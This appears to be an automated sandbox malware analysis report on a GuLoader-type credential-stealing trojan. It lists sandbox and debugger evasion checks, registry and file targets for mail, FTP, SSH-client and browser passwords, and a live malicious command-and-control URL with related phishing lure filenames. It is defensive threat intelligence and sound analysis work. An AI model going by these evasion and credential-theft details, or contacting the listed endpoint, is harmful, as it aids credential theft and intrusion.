DDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING vs lzJWJgZhPc.exe

Source: Form_Sporogeni.exe.1.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: lzJWJgZhPc.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

File read: C:\Users\user\Desktop\lzJWJgZhPc.exe

Jump to behavior

Source: lzJWJgZhPc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\lzJWJgZhPc.exe "C:\Users\user\Desktop\lzJWJgZhPc.exe"
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

File created: C:\Users\user\AppData\Local\Temp\nsbD32D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/4@2/3

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Code function: 1_2_004021AA CoCreateInstance,

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Source: lzJWJgZhPc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A12E4 push es; retf
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A12FC push es; retf
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A3B17 push 77CDC3EFh; ret
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A552B push edx; iretd
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A2956 push ecx; retf

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	File created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 5964	Thread sleep count: 457 > 30
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 4828	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Window / User API: threadDelayed 457

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_0040290B FindFirstFileW,

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Thread delayed: delay time: 60000

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

API call chain: ExitProcess graph end node

Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080ACC64 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080ABEB6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A9349 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Code function: 6_2_080AA615 LdrInitializeThunk,LoadLibraryA,

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping2	Security Software Discovery31	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection11	Virtualization/Sandbox Evasion211	Credentials in Registry1	Virtualization/Sandbox Evasion211	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Access Token Manipulation1	Security Account Manager	Application Window Discovery1	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Remote System Discovery1	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery6	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
lzJWJgZhPc.exe	39%	ReversingLabs	Win32.Backdoor.Androm

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://63.250.34.171/tickets.php?id=277	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.203.110	true	false	high
googlehosted.l.googleusercontent.com	142.250.180.161	true	false	high
doc-00-50-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://63.250.34.171/tickets.php?id=277	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nsis.sf.net/NSIS_ErrorError	lzJWJgZhPc.exe	false	high
https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf	Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp	false	high
https://doc-00-50-docs.googleusercontent.com/	Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.180.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
63.250.34.171	unknown	United States	22612	NAMECHEAP-NETUS	true
142.250.203.110	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532379
Start date:	02.12.2021
Start time:	07:07:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	lzJWJgZhPc (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/4@2/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 97.1%) Quality average: 84.4% Quality standard deviation: 23.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/532379/sample/lzJWJgZhPc.exe

Simulations

Behavior and APIs

Time	Type	Description
07:09:46	API Interceptor	1x Sleep call for process: Form_Sporogeni.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
63.250.34.171	90888234001.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=539
	FedEx Shipping documents.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=552
	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=277
	Anexo I e II do convite#U00b7pdf.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=156
	QfXk1qRIDN.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	P.I..xlsx	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	Lkinv70923.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=550
	ODkVvBA5vb.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	Product_Specification_Sheet.xlsx	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=538
	loader2.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=550
	3MBqpjNC1q.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	Ship particulars.xlsx	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=537
	DHL Receipt_AWB8114704847788.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=552
	HalkbankEkstre20211124073809405251,pdf.exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=562
	Order EnquiryCRM0754000001965-pdf(109KB).exe	Get hash	malicious	Browse	63.250.34.171/tickets.php?id=544

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	Poh Tiong Trading - products list.exe	Get hash	malicious	Browse	198.54.117.217
	SKM_C01112021.exe	Get hash	malicious	Browse	198.54.117.210
	90888234001.exe	Get hash	malicious	Browse	63.250.34.171
	TZAT0vss4p.exe	Get hash	malicious	Browse	162.213.251.105
	Orden econo-002064.pdf.exe	Get hash	malicious	Browse	198.54.122.60
	DOC209272621615.PDF.exe	Get hash	malicious	Browse	198.54.117.211
	FedEx Shipping documents.exe	Get hash	malicious	Browse	63.250.34.171
	WMHighfield.html	Get hash	malicious	Browse	198.54.115.249
	quotation-linde-tunisia-plc-december-2021.xlsx	Get hash	malicious	Browse	198.54.117.216
	Gracehealthmi.org7X9YCEB6AI.htm	Get hash	malicious	Browse	162.0.232.224
	3F6uSD2qZXHmXb8.exe	Get hash	malicious	Browse	162.255.119.151
	OVER R RICHIESTA D'OFFERTA ITEM R206,pdf.exe	Get hash	malicious	Browse	63.250.38.71
	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	63.250.34.171
	draft_inv dec21.exe	Get hash	malicious	Browse	185.61.153.97
	Overdue Invoice.exe	Get hash	malicious	Browse	198.54.117.215
	SOA.exe	Get hash	malicious	Browse	37.61.238.59
	Statement 12-01-2021.exe	Get hash	malicious	Browse	198.54.117.215
	Sz4lxTmH7r.exe	Get hash	malicious	Browse	199.192.28.206
	77isbA5bpi.exe	Get hash	malicious	Browse	198.54.117.218
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	198.54.117.218

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	#U0420R#U04223445FM.htm	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	SMK_EFT_BILLPAY.html	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	GlobalfoundriesINV33-45776648.htm	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	koCttsCjGY.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	Chrome.Update.23af76.js	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
	DHL Express shipment notification.exe	Get hash	malicious	Browse	142.250.203.110 142.250.180.161
